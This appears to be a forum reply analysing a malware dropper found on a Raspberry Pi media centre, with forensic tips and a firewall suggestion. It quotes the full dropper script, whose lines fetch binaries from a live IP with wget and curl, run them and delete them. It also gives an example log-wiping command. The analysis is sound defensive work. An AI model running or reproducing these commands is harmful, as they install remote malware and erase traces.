Ok - from the file you sent me, the script actually tells us what this is about.
Root-kit installation script, which downloads and executes itself, then deletes the code to not leave traces on the filesystem.
It first changes into a directory, and will choose the first match trying out tmp, /var/run, /mnt, /root and finally /.
Once in there, it downloads a file with wget. As wget does not exist everywhere, it tries again with curl, hoping that one of the commands is successfull.
Then it changes the mode of the file to be executable, executes it, then deletes itself.
What I didn’t find in the script, it the log-erase function. usually they have inside the script a
rm -f /var/log/system /var/log/messages /var/log/auth /var/log/secure …
And we see where he has all his files hosted. IP 185.73.147.5 (located in the Netherlands).
From the listing, it seems he tries to install a whole bunch of programs. Going from the names, we have here NTPD (Timeserver), sshd/openssh (SSH Server). These are probably modified to allow acces to certain people/ip/keys/hosts.
After that we have an own bash/sh, ftp and wget apache, telnet as a cron program. Probably all preconfigured in a way to implant itself onto the system, and once someone has detected parts and deleted it, can restore its hack again through an alternate method.
I suspect privnut does something else alltogether (DDoS, scans your Mediacenter for medias and shares these, or worse, shares these through a torrent. We’d need to know exactly what it does, but I don’t have a free PI here to test it out. I’d take a packet capture to analyze what happens with it. Or can one run the PI/Osmc image inside a virtual machine???
Eventually you could check the /root/.bash_history, /.bash_history and /home/kodi/.bash_history files to see if je did something else, or if this was a completely automated script.
Also, issue a: ~# last
command. This will show you who logged in and from where.
If there are no traces of a user-login from an unknown IP address, and the .bash_history files do not show any activity, chances are that the hack occured through a Kodi Add-On. We’ll have to find that Add-On in that case!
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privntpd1; curl -O http://185.73.147.5/privntpd1; chmod +x privntpd1; ./privntpd1; rm -rf privntpd1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privsshd1; curl -O http://185.73.147.5/privsshd1; chmod +x privsshd1; ./privsshd1; rm -rf privsshd1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privopenssh1; curl -O http://185.73.147.5/privopenssh1; chmod +x privopenssh1; ./privopenssh1; rm -rf privopenssh1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privbash1; curl -O http://185.73.147.5/privbash1; chmod +x privbash1; ./privbash1; rm -rf privbash1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privtftp1; curl -O http://185.73.147.5/privtftp1; chmod +x privtftp1; ./privtftp1; rm -rf privtftp1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privwget1; curl -O http://185.73.147.5/privwget1; chmod +x privwget1; ./privwget1; rm -rf privwget1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privcron1; curl -O http://185.73.147.5/privcron1; chmod +x privcron1; ./privcron1; rm -rf privcron1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privftp1; curl -O http://185.73.147.5/privftp1; chmod +x privftp1; ./privftp1; rm -rf privftp1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privpftp1; curl -O http://185.73.147.5/privpftp1; chmod +x privpftp1; ./privpftp1; rm -rf privpftp1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privsh1; curl -O http://185.73.147.5/privsh1; chmod +x privsh1; ./privsh1; rm -rf privsh1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privnut1; curl -O http://185.73.147.5/privnut1; chmod +x privnut1; ./privnut1; rm -rf privnut1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privapache21; curl -O http://185.73.147.5/privapache21; chmod +x privapache21; ./privapache21; rm -rf privapache21
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privtelnetd1; curl -O http://185.73.147.5/privtelnetd1; chmod +x privtelnetd1; ./privtelnetd1; rm -rf privtelnetd1
What you can do in a short-term to prevent this from happening, add a filter to block 185.73.147.5 to your firewall/router in both directions. This will prevent the user to download its files. But that is only valid until he identifies it and changes the remote server. If this is implanted through a Kodi Add-On, this would actually prevent this tool from spreading in your lan.
UPDATE: There is one thing I want you, and all the others, to be aware of.
The reason one secures his systems is not to have hackers go into it, and get a copy of your pr0n collection, or your contacts or your medias. The reason I secure my systems is to prevent these script kiddies to participate in new hacks using “my” system as source. Imagine a remote surgical operation takes place, and the DDoS cuts connectivity to the control-robot, patient dies.
That is the reason to secure your systems… ! You don’t do that, your are liable for whatever is done through your device.